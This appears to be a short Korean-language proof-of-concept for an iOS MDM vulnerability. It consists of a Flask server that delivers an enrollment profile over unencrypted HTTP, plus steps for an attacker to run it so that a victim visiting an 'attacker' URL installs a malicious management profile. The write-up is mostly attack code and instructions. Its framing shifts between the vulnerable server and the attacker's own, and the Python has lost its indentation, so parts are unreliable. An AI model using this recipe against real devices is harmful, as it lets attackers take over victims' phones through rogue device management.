
CVE-2026-22011용 PoC Flask 서버로, HTTP를 통해 악성 iOS MDM 등록 프로필을 제공하여 중간자(MITM) 가로채기 및 기기 손상을 가능하게 합니다.
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file
app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
# Vulnerability: profile delivered without HTTPS
return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
MDM 등록 프로필이 암호화나 디지털 서명 검증 없이 일반 HTTP를 통해 제공됩니다. 동일한 네트워크에 있는 공격자는 요청을 가로채 프로필을 악성 프로필로 교체하여 기기 관리 권한을 획득할 수 있습니다.
공격자의 HTTP 서버를 시작합니다:
python mdm_server.py
피해자가 http://attacker/enroll.mobileconfig를 방문하면 악성 프로필이 다운로드됩니다.